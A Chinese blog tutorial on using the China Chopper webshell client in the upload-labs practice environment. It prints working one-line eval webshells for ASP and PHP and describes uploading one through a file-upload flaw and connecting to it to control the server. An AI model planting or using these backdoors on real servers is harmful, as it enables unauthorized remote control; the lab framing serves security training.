中國(guó)菜刀的使用

菜刀的安裝大家在網(wǎng)上隨便一搜就很多,這里不再和大家詳解,主要是講解一下菜刀的原理及使用;

1.中國(guó)菜刀支持的服務(wù)端腳本:PHP、ASP;(常用的腳本就這兩種)
2.主要功能有:文件管理(有足夠的權(quán)限時(shí)候可以管理整個(gè)磁盤/文件系統(tǒng)),數(shù)據(jù)庫(kù)管理,虛擬終端。
3.菜刀的工作原理是:利用上傳到服務(wù)器的一句話木馬再通過(guò)一些添加配置就可以工作了

一句話木馬:
Asp: <%eval request("x")%>

php: <?php @eval($_POST['x']);?>

我們就拿上一篇博客upload-labs教程(一)來(lái)講一下:
在上一篇中,我們通過(guò)文件長(zhǎng)傳漏洞成功將我們的一句話木馬寫入服務(wù)器中,這時(shí)我們就需要通過(guò)菜刀進(jìn)入到對(duì)方的電腦中;
首先,我們先將一句話木馬寫入事先準(zhǔn)備好的zqlone.php中,如圖:


1

然后就根據(jù)上一篇博客upload-labs教程(一)進(jìn)行抓包:


2

復(fù)制圖像地址后進(jìn)入到該地址,得到圖像的路徑;
3

然后我們打開菜刀,右鍵添加:
4

將這些信息填到相應(yīng)的位置,然后點(diǎn)擊添加?。?/p>

5

成功進(jìn)入到對(duì)方電腦中?。?!

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

友情鏈接更多精彩內(nèi)容